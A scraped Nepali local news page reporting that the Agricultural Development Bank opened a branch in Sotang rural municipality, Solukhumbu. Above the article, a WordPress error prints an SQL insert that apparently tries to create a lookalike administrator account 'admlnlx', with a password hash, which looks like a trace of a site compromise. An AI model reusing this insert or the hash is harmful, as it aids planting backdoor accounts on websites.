WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5PkTa51cNjWWgk0laZQuHCO1PKGeK1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:14:15', '', 'admlnlx', 'admlnlx')

सोताङमा कृषि विकास बैँक शाखा बिस्तार – Gaule Khabar

सोताङमा कृषि विकास बैँक शाखा बिस्तार

सोताङमा कृषि विकास बैँक शाखा बिस्तार

गाउँले न्यूज, २२ फाल्गुन, सोलुखुम्बु । सोलुखुम्बु जिल्लाको सोताङ गाँउपालिकामा कृषि विकास बैंकले सेवा सुरु गरेको छ ।

राज्य पून सम्रचना अनुसार प्रतेक स्थानीय तहमा बैकको सुबिधा पुर्‍याउने राज्यको लक्ष अनुसार मंगलबार गाँउपालिका अध्यक्ष वीर बहादुर राईले सो बैँकको उद्घाटन गरे । राईले बैंक संचालनमा आएपछि बैकिंङ बातावरण सहज हुने बताए ।

कृषि बिकास बैँकको शाखा विस्तार भएसंगै बैकिंङ कारोबारको लागि सल्लेरी धाउनुपर्ने बाध्यता हटेको छ । स्थानीय स्तरका नागरिकमा बचत गर्ने बानीको विकासका साथै विकासका आयोजना कार्यान्वयनका लागि पनि थप सहज हुने अपेक्षा राखिएको छ ।

बैँकले जनमूखि सेवा प्रवाह गर्ने शाखा प्रबन्धक पेसल कुमार दाहालले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका